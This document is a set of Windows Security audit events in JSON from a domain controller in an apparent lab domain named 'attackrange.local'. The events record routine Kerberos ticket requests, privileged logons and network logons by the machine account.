{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220275,"ProcessID":864,"ThreadID":3744,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tSupplied Realm Name:\tATTACKRANGE.LOCAL\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-1008","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220276,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-8400769$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{D7CA9DD6-51D0-0808-95AB-F56B4CF637FF}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-8400769$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{D7CA9DD6-51D0-0808-95AB-F56B4CF637FF}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220277,"ProcessID":864,"ThreadID":3744,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-8400769$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{D7CA9DD6-51D0-0808-95AB-F56B4CF637FF}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-8400769$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{D7CA9DD6-51D0-0808-95AB-F56B4CF637FF}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220278,"ProcessID":864,"ThreadID":2940,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44CA9\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x44ca9","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220279,"ProcessID":864,"ThreadID":588,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44CA8\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x44ca8","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220280,"ProcessID":864,"ThreadID":2940,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x44CA9\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t49697\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x44ca9","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"49697","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220281,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x44CA8\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t49698\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x44ca8","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"49698","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220282,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-8400769$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{D7CA9DD6-51D0-0808-95AB-F56B4CF637FF}\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x60810010\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-8400769$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x60810010","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{D7CA9DD6-51D0-0808-95AB-F56B4CF637FF}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220283,"ProcessID":864,"ThreadID":2940,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44F35\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x44f35","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220284,"ProcessID":864,"ThreadID":2940,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x44F35\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t49699\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x44f35","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"49699","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220285,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-8400769$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{14023241-E16F-A00A-7B8B-1F9FCC4C37BD}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-8400769$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{14023241-E16F-A00A-7B8B-1F9FCC4C37BD}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220286,"ProcessID":864,"ThreadID":908,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x451F7\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x451f7","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
